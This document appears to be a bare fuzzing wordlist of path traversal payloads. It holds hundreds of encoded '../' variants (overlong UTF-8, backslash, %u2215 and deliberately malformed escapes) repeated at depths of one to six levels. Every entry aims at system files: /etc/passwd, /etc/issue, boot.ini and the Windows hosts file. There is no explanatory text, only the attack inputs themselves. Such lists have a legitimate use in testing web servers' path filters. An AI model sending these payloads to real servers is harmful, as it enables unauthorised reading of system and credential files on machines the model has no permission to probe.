-%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fboot.ini -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fetc%c0%2fpasswd -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fetc%c0%2fissue -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fboot.ini -%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2f%2e%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%2e%2e%c0%afetc%c0%afpasswd -%2e%2e%c0%afetc%c0%afissue -%2e%2e%c0%afboot.ini -%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%2e%2e%c0%af%2e%2e%c0%afetc%c0%afpasswd -%2e%2e%c0%af%2e%2e%c0%afetc%c0%afissue -%2e%2e%c0%af%2e%2e%c0%afboot.ini -%2e%2e%c0%af%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afetc%c0%afpasswd -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afetc%c0%afissue -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afboot.ini -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afetc%c0%afpasswd -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afetc%c0%afissue -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afboot.ini -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afetc%c0%afpasswd -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afetc%c0%afissue -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afboot.ini -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afetc%c0%afpasswd -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afetc%c0%afissue -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afboot.ini -%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%2e%2e%c0%5cetc%c0%5cpasswd -%2e%2e%c0%5cetc%c0%5cissue -%2e%2e%c0%5cboot.ini -%2e%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%2e%2e%c0%5c%2e%2e%c0%5cetc%c0%5cpasswd -%2e%2e%c0%5c%2e%2e%c0%5cetc%c0%5cissue -%2e%2e%c0%5c%2e%2e%c0%5cboot.ini -%2e%2e%c0%5c%2e%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cetc%c0%5cpasswd -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cetc%c0%5cissue -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cboot.ini -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cetc%c0%5cpasswd -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cetc%c0%5cissue -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cboot.ini -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cetc%c0%5cpasswd -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cetc%c0%5cissue -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cboot.ini -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cetc%c0%5cpasswd -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cetc%c0%5cissue -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cboot.ini -%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5c%2e%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%2e%2e%c1%9cetc%c1%9cpasswd -%2e%2e%c1%9cetc%c1%9cissue -%2e%2e%c1%9cboot.ini -%2e%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%2e%2e%c1%9c%2e%2e%c1%9cetc%c1%9cpasswd -%2e%2e%c1%9c%2e%2e%c1%9cetc%c1%9cissue -%2e%2e%c1%9c%2e%2e%c1%9cboot.ini -%2e%2e%c1%9c%2e%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cetc%c1%9cpasswd -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cetc%c1%9cissue -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cboot.ini -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cetc%c1%9cpasswd -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cetc%c1%9cissue -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cboot.ini -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cetc%c1%9cpasswd -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cetc%c1%9cissue -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cboot.ini -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cetc%c1%9cpasswd -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cetc%c1%9cissue -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cboot.ini -%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9c%2e%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -%2e%2e%c1%pcetc%c1%pcpasswd -%2e%2e%c1%pcetc%c1%pcissue -%2e%2e%c1%pcboot.ini -%2e%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%2e%2e%c1%pc%2e%2e%c1%pcetc%c1%pcpasswd -%2e%2e%c1%pc%2e%2e%c1%pcetc%c1%pcissue -%2e%2e%c1%pc%2e%2e%c1%pcboot.ini -%2e%2e%c1%pc%2e%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcetc%c1%pcpasswd -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcetc%c1%pcissue -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcboot.ini -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcetc%c1%pcpasswd -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcetc%c1%pcissue -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcboot.ini -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcetc%c1%pcpasswd -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcetc%c1%pcissue -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcboot.ini -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcetc%c1%pcpasswd -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcetc%c1%pcissue -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcboot.ini -%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pc%2e%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -%2e%2e%c0%9vetc%c0%9vpasswd -%2e%2e%c0%9vetc%c0%9vissue -%2e%2e%c0%9vboot.ini -%2e%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%2e%2e%c0%9v%2e%2e%c0%9vetc%c0%9vpasswd -%2e%2e%c0%9v%2e%2e%c0%9vetc%c0%9vissue -%2e%2e%c0%9v%2e%2e%c0%9vboot.ini -%2e%2e%c0%9v%2e%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vetc%c0%9vpasswd -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vetc%c0%9vissue -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vboot.ini -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vetc%c0%9vpasswd -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vetc%c0%9vissue -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vboot.ini -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vetc%c0%9vpasswd -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vetc%c0%9vissue -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vboot.ini -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vetc%c0%9vpasswd -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vetc%c0%9vissue -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vboot.ini -%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9v%2e%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -%2e%2e%c0%qfetc%c0%qfpasswd -%2e%2e%c0%qfetc%c0%qfissue -%2e%2e%c0%qfboot.ini -%2e%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%2e%2e%c0%qf%2e%2e%c0%qfetc%c0%qfpasswd -%2e%2e%c0%qf%2e%2e%c0%qfetc%c0%qfissue -%2e%2e%c0%qf%2e%2e%c0%qfboot.ini -%2e%2e%c0%qf%2e%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfetc%c0%qfpasswd -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfetc%c0%qfissue -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfboot.ini -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfetc%c0%qfpasswd -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfetc%c0%qfissue -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfboot.ini -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfetc%c0%qfpasswd -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfetc%c0%qfissue -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfboot.ini -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfetc%c0%qfpasswd -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfetc%c0%qfissue -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfboot.ini -%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qf%2e%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%2e%2e%c1%8setc%c1%8spasswd -%2e%2e%c1%8setc%c1%8sissue -%2e%2e%c1%8sboot.ini -%2e%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%2e%2e%c1%8s%2e%2e%c1%8setc%c1%8spasswd -%2e%2e%c1%8s%2e%2e%c1%8setc%c1%8sissue -%2e%2e%c1%8s%2e%2e%c1%8sboot.ini -%2e%2e%c1%8s%2e%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8setc%c1%8spasswd -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8setc%c1%8sissue -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8sboot.ini -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8setc%c1%8spasswd -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8setc%c1%8sissue -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8sboot.ini -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8setc%c1%8spasswd -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8setc%c1%8sissue -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8sboot.ini -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8setc%c1%8spasswd -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8setc%c1%8sissue -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8sboot.ini -%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8s%2e%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%2e%2e%c1%1cetc%c1%1cpasswd -%2e%2e%c1%1cetc%c1%1cissue -%2e%2e%c1%1cboot.ini -%2e%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%2e%2e%c1%1c%2e%2e%c1%1cetc%c1%1cpasswd -%2e%2e%c1%1c%2e%2e%c1%1cetc%c1%1cissue -%2e%2e%c1%1c%2e%2e%c1%1cboot.ini -%2e%2e%c1%1c%2e%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cetc%c1%1cpasswd -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cetc%c1%1cissue -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cboot.ini -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cetc%c1%1cpasswd -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cetc%c1%1cissue -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cboot.ini -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cetc%c1%1cpasswd -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cetc%c1%1cissue -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cboot.ini -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cetc%c1%1cpasswd -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cetc%c1%1cissue -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cboot.ini -%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1c%2e%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%2e%2e%c1%afetc%c1%afpasswd -%2e%2e%c1%afetc%c1%afissue -%2e%2e%c1%afboot.ini -%2e%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%2e%2e%c1%af%2e%2e%c1%afetc%c1%afpasswd -%2e%2e%c1%af%2e%2e%c1%afetc%c1%afissue -%2e%2e%c1%af%2e%2e%c1%afboot.ini -%2e%2e%c1%af%2e%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afetc%c1%afpasswd -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afetc%c1%afissue -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afboot.ini -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afetc%c1%afpasswd -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afetc%c1%afissue -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afboot.ini -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afetc%c1%afpasswd -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afetc%c1%afissue -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afboot.ini -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afetc%c1%afpasswd -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afetc%c1%afissue -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afboot.ini -%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%af%2e%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%2e%2e%bg%qfetc%bg%qfpasswd -%2e%2e%bg%qfetc%bg%qfissue -%2e%2e%bg%qfboot.ini -%2e%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%2e%2e%bg%qf%2e%2e%bg%qfetc%bg%qfpasswd -%2e%2e%bg%qf%2e%2e%bg%qfetc%bg%qfissue -%2e%2e%bg%qf%2e%2e%bg%qfboot.ini -%2e%2e%bg%qf%2e%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfetc%bg%qfpasswd -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfetc%bg%qfissue -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfboot.ini -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfetc%bg%qfpasswd -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfetc%bg%qfissue -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfboot.ini -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfetc%bg%qfpasswd -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfetc%bg%qfissue -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfboot.ini -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfetc%bg%qfpasswd -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfetc%bg%qfissue -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfboot.ini -%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qf%2e%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%2e%2e%u2215etc%u2215passwd -%2e%2e%u2215etc%u2215issue -%2e%2e%u2215boot.ini -%2e%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%2e%2e%u2215%2e%2e%u2215etc%u2215passwd -%2e%2e%u2215%2e%2e%u2215etc%u2215issue -%2e%2e%u2215%2e%2e%u2215boot.ini -%2e%2e%u2215%2e%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215etc%u2215passwd -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215etc%u2215issue -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215boot.ini -%2e%2e%u2215%2e%2e%u2215%2e%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts 